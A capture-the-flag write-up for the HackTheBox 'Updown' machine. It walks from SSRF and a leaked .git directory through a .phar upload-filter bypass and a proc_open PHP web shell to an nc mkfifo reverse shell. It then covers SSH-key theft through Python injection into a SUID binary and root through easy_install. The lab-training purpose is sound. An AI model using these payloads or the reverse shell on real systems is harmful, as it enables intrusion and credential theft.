# HackTheBox - Updown
## NMAP
```bash
Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
The web page has a functionality to check if any site is up also it shows us a domain name `siteisup.htb` so let's add this in hosts file
With the debug mode enabled we can see the response made on the url which leads to Server Side Request Forgery (SSRF)
I tried using the file protocl to read local file `file:///etc/passwd` but it was blocked
On the domain name, we can fuzz for subdomains with `wfuzz`
```bash
wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131
```
This finds a subdomain `dev` with 403 status code
We can try accessing it through the status check as there exsits SSRF
But it shows that it's down so there maybe some filtering going on dev site, fuzzing for files and directories, it shows `/dev` but it returns a blank page
So fuzzing at `/dev/`, we'll find `.git`
We can downloag `.git` thourgh wget recursivley with ``--recusrive`
```bash
wget --recursive http://10.10.11.177/dev/.git/
```
After downloading the files, navigate to directory which has `.git` and run `git checkout .` to recover the files
Checking `changelog.txt` it talks about removing the upload option
`.htaccess` file shows us a header if it's not in the request, the request will be denied
I used a burp extension called `Add Custom Header` so that on every request the special header gets added
Looking at `checker.php` file it checks for file extensions which may lead to uploading php files to get code execution
It's checking for all extensions execpt for `.phar`, but even if we upload it it's going to read the contents of the file, make a request to see if there' 200 status code and it's going to delete the file after making a request to each of the content available in the file
To get code execution, we can make the site make a request to a site which isn't reachable so it's going to try to make a reqeust to that site for sometime and our uploaded file won't get deleted
## Foothold
From `phpinfo()` we can see most of the functions are disabled that could allow command execution, to find out which function can used to get command execution which can use this script https://github.com/teambi0s/dfunc-bypasser
We can abuse `proc_open` to get command execution
https://www.macs.hw.ac.uk/~hwloidl/docs/PHP/function.proc-open.html
```php
array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("bash", $descriptorspec, $pipes);
if (is_resource($process)) {
// $pipes now looks like this:
// 0 => writeable handle connected to child stdin
// 1 => readable handle connected to child stdout
// Any error output will be appended to /tmp/error-output.txt
fwrite($pipes[0], "id");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
// It is important that you close any pipes before calling
// proc_close in order to avoid a deadlock
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
```
On uploading the file, we'll get the output of `id` command
Using nc mkinfo we can get the reverse shell
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f
```
## Privilege Escalation (developer)
In `developer`'s directory we can find `siteisup` binary along with it's source code which can run as developer because of SUID
We can exploit this by import `os` module and executing `id` command
```
__import__('os').system('id')
```
From here we can get the ssh key and login as developer user
```
__import__('os').system('cat /home/developer/.ssh/id_rsa')
```
## Privilege Escalation (root)
Running `sudo -l` will show that we can run `/usr/local/bin/easy_install` as root user
We can abuse this by checking GTFOBINS for the abuse
https://gtfobins.github.io/gtfobins/easy_install/
